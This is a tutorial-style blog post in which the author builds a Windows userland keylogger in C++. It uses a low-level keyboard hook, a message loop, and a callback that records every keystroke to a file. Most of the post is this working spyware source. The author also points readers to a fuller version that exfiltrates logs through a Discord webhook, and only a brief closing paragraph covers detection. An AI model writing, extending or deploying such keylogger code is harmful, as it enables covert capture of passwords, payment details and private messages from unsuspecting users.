Obsess over every detail. Ask why it works. Ask why it isn’t built another way.

Intro

I’ve been messing around with malware development recently, and as part of my second warm-up project, I decided to write a simple keylogger. The goal here is to understand how userland keyloggers work on Windows, without getting overwhelmed by low-level internals.

What is a keylogger?

A keylogger is a type of malware designed to record keystrokes in order to steal sensitive information such as passwords, credit card numbers, and private messages.

Keyloggers can exist at different levels, from hardware devices to kernel-mode drivers to userland programs.

In this article, we’ll focus only on userland keyloggers, specifically how they work and how they’re commonly implemented.

Most keyloggers store captured keystrokes in a file, but it’s also possible to exfiltrate them directly without ever touching disk. For simplicity, we’ll stick to basic file-based logging.

How does a userland keylogger work?

Before writing a keylogger, it helps to understand, at a high level, how keyboard input flows through Windows.

Every key on a keyboard has a scan code, which is a hardware-level identifier sent when the key is pressed or released.

Windows processes keyboard input in layers:

1. Physical layer

The keyboard generates scan codes for key press and release events.

2. Driver layer

Keyboard drivers translate scan codes into virtual key codes (VK_*).

3. Userland

Applications receive these events as Windows messages, such as WM_KEYDOWN and WM_KEYUP.

For example, handling a virtual key code in a switch statement might look like this:

case VK_NUMPAD0:
    key = "0";
    break;
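
To make the userland layer a bit more concrete, here is a small sketch that turns a keyboard message identifier into its name. The numeric values are the ones documented for these messages in the Windows headers, redefined locally so the snippet compiles without windows.h. The constant names with the k prefix and the messageName helper are made up for this illustration and are not part of the original project.

```cpp
#include <cstdint>
#include <string>

// Documented values of the Windows keyboard messages, redefined here
// (assumption: we skip <windows.h> so the sketch builds on any platform).
constexpr std::uint32_t kWmKeyDown    = 0x0100; // WM_KEYDOWN
constexpr std::uint32_t kWmKeyUp      = 0x0101; // WM_KEYUP
constexpr std::uint32_t kWmSysKeyDown = 0x0104; // WM_SYSKEYDOWN
constexpr std::uint32_t kWmSysKeyUp   = 0x0105; // WM_SYSKEYUP

// Hypothetical helper: returns a readable name for a keyboard message id.
std::string messageName ( std::uint32_t message )
{
  switch ( message )
  {
  case kWmKeyDown:
    return "WM_KEYDOWN";
  case kWmKeyUp:
    return "WM_KEYUP";
  case kWmSysKeyDown:
    return "WM_SYSKEYDOWN";
  case kWmSysKeyUp:
    return "WM_SYSKEYUP";
  default:
    return "OTHER";
  }
}
```

The SYS variants show up when a key is pressed while Alt is held, which is why the hook callback later checks both WM_KEYDOWN and WM_SYSKEYDOWN.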

Implementation

Let’s start with the implementation. Don’t worry, I’ll walk through it step by step. First, we’ll create a keyboard hook.

int main()
{

  // 1. Create a keyboard hook
  HHOOK keyboardHook = SetWindowsHookEx (

      WH_KEYBOARD_LL,       // Type of hook procedure to be installed, I chose WH_KEYBOARD_LL to monitor low level keyboard inputs
                            // https://learn.microsoft.com/en-us/windows/win32/winmsg/lowlevelkeyboardproc

      LowLevelKeyboardProc, // 2. Pointer to the hook procedure (Windows calls LowLevelKeyboardProc() on every keyboard event)
                            // 3. Note that the program itself doesn't call the function; Windows does whenever there's a keyboard event
      NULL,
      0

  );

  if ( keyboardHook == NULL )
  {
    std::cerr << "[ Failed to hook keyboard, exiting! ] \n";
    return 1;
  }

  // 4. Keep the program alive and process Windows messages
  // WH_KEYBOARD_LL requires a message loop: Windows invokes the callback in the context of the thread that installed the hook, so that thread has to keep pumping messages
  MSG msg;

  while ( GetMessage ( &msg, NULL, 0, 0 ) )
  {
    TranslateMessage ( &msg );
    DispatchMessage ( &msg );
  }

  /*

  +------------------------------------------------------------------------------+
  | - SetWindowsHookEx     = Hey Windows, send me letters when someone types     |
  | - GetMessage loop      = You(Your program) checking your mailbox repeatedly  |
  | - LowLevelKeyboardProc = What you do when you receive a letter               |
  +------------------------------------------------------------------------------+

  */

  // It'll only unhook the keyboard once the GetMessage() loop stops (most likely closed by the user)
  UnhookWindowsHookEx ( keyboardHook );

  Logger::outputFile.close ();
  std::cout << "[ Stopped capturing ] \n";

  return 0;
}

Okay bro wait, what do you even mean by keyboard hook and what are these weird functions?

A hook is simply a mechanism that allows applications to intercept system-wide events, such as mouse input, keystrokes, or window messages, before they reach their target application.

You can think of it like a checkpoint: events pass through it, and you get a chance to inspect them. In this case, we’re intercepting keyboard events so we can log them.

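The important thing to understand is that your program never calls the hook procedure itself. Windows calls it for you whenever a keyboard event occurs.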

Make sure to read the comments in the code and refer to the MSDN documentation. It helps a lot here.

Handling and translating virtual keycodes

Next, we need a way to translate virtual key codes into readable characters.

We’ll track modifier state first:

namespace KeyboardState
{
  BOOL shift = false;
  BOOL capsLock = false;
}

Now we create a function that converts virtual key codes into characters:

std::string hookCode ( DWORD code, BOOL capsLock, BOOL shift )
{
  std::string key;
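  switch ( code ) // vkCode is an integer, so we can switch on it
  {
  // Letter keys: their virtual key codes match the ASCII codes of 'A'..'Z'
  // The headers define no VK_ constants for them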
  case 0x41:
    key = capsLock ? ( shift ? "a" : "A" ) : ( shift ? "A" : "a" );
    break;
  case 0x42:
    key = capsLock ? ( shift ? "b" : "B" ) : ( shift ? "B" : "b" );
    break;
  case 0x43:
    key = capsLock ? ( shift ? "c" : "C" ) : ( shift ? "C" : "c" );
    break;

  // Other keys
  case VK_NUMLOCK:
    key = " [NUM-LOCK] ";
    break;
  case VK_SCROLL:
    key = " [SCROLL-LOCK] ";
    break;
  default:
    key = "[UNK-KEY]";
    break;
  }

  return key;
}

If you’re wondering what these 0x41, 0x42, etc. values are: they’re virtual key codes. For example, according to the MSDN documentation, 0x41 corresponds to the A key.

We’re simply translating these numeric values into readable characters so the logs make sense.
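
The nested ternaries in the letter cases all encode the same rule: a letter comes out uppercase when exactly one of Caps Lock and Shift is active. Here is a minimal sketch of that rule as a standalone function. The name letterFromVk is hypothetical and not part of the original code, and it only covers the letter range 0x41 to 0x5A, where the virtual key code equals the ASCII code of the uppercase letter.

```cpp
#include <string>

// Hypothetical helper, shown only to illustrate the Caps Lock / Shift rule.
// Letter keys use virtual key codes 0x41..0x5A, which equal ASCII 'A'..'Z'.
std::string letterFromVk ( unsigned long code, bool capsLock, bool shift )
{
  if ( code < 0x41 || code > 0x5A )
  {
    return "[UNK-KEY]"; // not a letter key
  }

  // Uppercase when exactly one of the two modifiers is active (logical XOR)
  const bool upper = ( capsLock != shift );

  const char base = static_cast<char> ( code ); // 'A'..'Z'
  const char c = upper ? base : static_cast<char> ( base + ( 'a' - 'A' ) );

  return std::string ( 1, c );
}
```

With both modifiers on they cancel out, so letterFromVk ( 0x41, true, true ) gives a lowercase "a", the same result as the original ternary.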

Creating the hook callback

Now let’s implement the function that Windows calls whenever a keyboard event occurs.

LRESULT CALLBACK LowLevelKeyboardProc ( int code, WPARAM wParam, LPARAM lParam )
{
  /*

    LRESULT CALLBACK LowLevelKeyboardProc
    (

    int code,        // Status: HC_ACTION, or negative
    WPARAM wParam,   // Event type: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, etc.
    LPARAM lParam    // Pointer to KBDLLHOOKSTRUCT (detailed keyboard info)

    )

    https://learn.microsoft.com/en-us/windows/win32/winmsg/lowlevelkeyboardproc

*/

  SHORT getcapsLockStatus = GetKeyState ( VK_CAPITAL );

  if ( ( getcapsLockStatus & 0x0001 ) != 0 )
  {
    // Check if the low-order bit is set
    KeyboardState::capsLock = true;
  }

  else
  {
    KeyboardState::capsLock = false;
  }

  // Create a pointer of KBDLLHOOKSTRUCT that contains keyboard event details (vkCode, scanCode, flags, etc.)
  KBDLLHOOKSTRUCT *keyboardData = reinterpret_cast<KBDLLHOOKSTRUCT *> ( lParam );

  // Is this a valid keyboard event that we can process? if yes then proceed
  if ( code == HC_ACTION )
  {
    /*

     With a pointer to KBDLLHOOKSTRUCT we can now read the virtual key code like this:
     keyboardData->vkCode

    typedef struct tagKBDLLHOOKSTRUCT {
      DWORD     vkCode;
      DWORD     scanCode;
      DWORD     flags;
      DWORD     time;
      ULONG_PTR dwExtraInfo;
    } KBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

     */

    // Track whether Shift is currently held down
    if ( keyboardData->vkCode == VK_LSHIFT || keyboardData->vkCode == VK_RSHIFT )
    {
      if ( wParam == WM_KEYDOWN )
      {
        KeyboardState::shift = true;
      }

      else
      {
        KeyboardState::shift = false;
      }
    }

    // Checks if a key is pressed down
    if ( wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN )
    {
      if ( keyboardData->vkCode )
      {

        // Clear the contents of the buffer
        Logger::output.str ( "" );

        // Store the keylogs in buffer
        Logger::output << hookCode ( keyboardData->vkCode, KeyboardState::capsLock, KeyboardState::shift );

        // Store the buffer data inside outputFile
        Logger::outputFile << Logger::output.str ();
        Logger::outputFile.flush ();

        // Print the buffer contents to the console
        std::cout << Logger::output.str ();
      }

    }
  }

  // Pass the event to the next hook to avoid breaking input
  return CallNextHookEx ( NULL, code, wParam, lParam );
}
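
The Caps Lock check at the top of the callback relies on how GetKeyState packs its return value: per the documentation, the low-order bit says whether a toggle key such as Caps Lock is on, and the high-order bit says whether the key is currently held down. Here is a small sketch of reading those two bits. The helper names isToggled and isDown are made up for this example, and the state value is passed in as a plain short so the snippet compiles without windows.h.

```cpp
// Hypothetical helpers for decoding a GetKeyState-style return value.
// The value is a 16-bit signed integer (SHORT in the Windows headers).

// Low-order bit set: the key is toggled on (e.g. Caps Lock is active).
bool isToggled ( short state )
{
  return ( state & 0x0001 ) != 0;
}

// High-order bit set: the key is physically down right now.
bool isDown ( short state )
{
  return ( state & 0x8000 ) != 0;
}
```

This is why the callback masks with 0x0001 for Caps Lock: it cares about the toggle state, not about whether the key happens to be pressed at that instant.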

At this point, we have all the core components in place: a keyboard hook to intercept input, a hook callback that Windows invokes on each keyboard event, a keycode translation system to convert virtual key codes into readable characters, and a message loop to keep the process alive. Together, these pieces are enough to build a fully functional userland keylogger. The full version, which also includes file exfiltration and sending logs via a Discord webhook, is available on my GitHub. Feel free to reference it.

poc

Now, how do we detect this?

Processing WM_KEYDOWN in a background process with no visible UI can already be a red flag, especially if the program has no real reason to care about keyboard input. On its own, WM_KEYDOWN is normal and used everywhere, but it becomes suspicious when a process keeps handling these messages while not in focus, having no active window, and offering no user-facing functionality. When this is paired with a global low-level keyboard hook (WH_KEYBOARD_LL), a hook that stays installed for a long time, and keystrokes being stored or buffered somewhere, it starts to look much more like keylogging behavior than a legitimate app.
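
To show how these signals stack up, here is a rough sketch of a scoring heuristic a defender might start from. Everything in it is an assumption for illustration: the ProcessObservation struct, its field names, the suspicionScore function, and the 10 minute threshold are all made up, and how you would actually collect these observations (EDR telemetry, ETW, etc.) is out of scope here.

```cpp
#include <chrono>

// Hypothetical snapshot of what a monitoring tool has observed about a process.
struct ProcessObservation
{
  bool hasVisibleWindow;         // does the process show any UI?
  bool hasLowLevelKeyboardHook;  // is a WH_KEYBOARD_LL hook installed?
  std::chrono::seconds hookAge;  // how long the hook has been installed
  bool writesAfterKeystrokes;    // file or network writes that follow key events
};

// Hypothetical heuristic: each signal from the paragraph above adds one point.
// Without a low-level keyboard hook there is nothing to score.
int suspicionScore ( const ProcessObservation &p )
{
  if ( !p.hasLowLevelKeyboardHook )
  {
    return 0;
  }

  int score = 1; // the hook itself

  if ( !p.hasVisibleWindow )
  {
    score += 1; // no user-facing reason to watch the keyboard
  }
  if ( p.hookAge > std::chrono::minutes ( 10 ) ) // arbitrary threshold
  {
    score += 1; // long-lived hook
  }
  if ( p.writesAfterKeystrokes )
  {
    score += 1; // keystrokes are being stored or sent somewhere
  }

  return score;
}
```

No single signal is conclusive, since hotkey tools and accessibility software also install low-level keyboard hooks. The point is that the combination is what makes a process worth a closer look.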

that’s all bye, wibbly woobly wobbly woo! 67 gyat sigma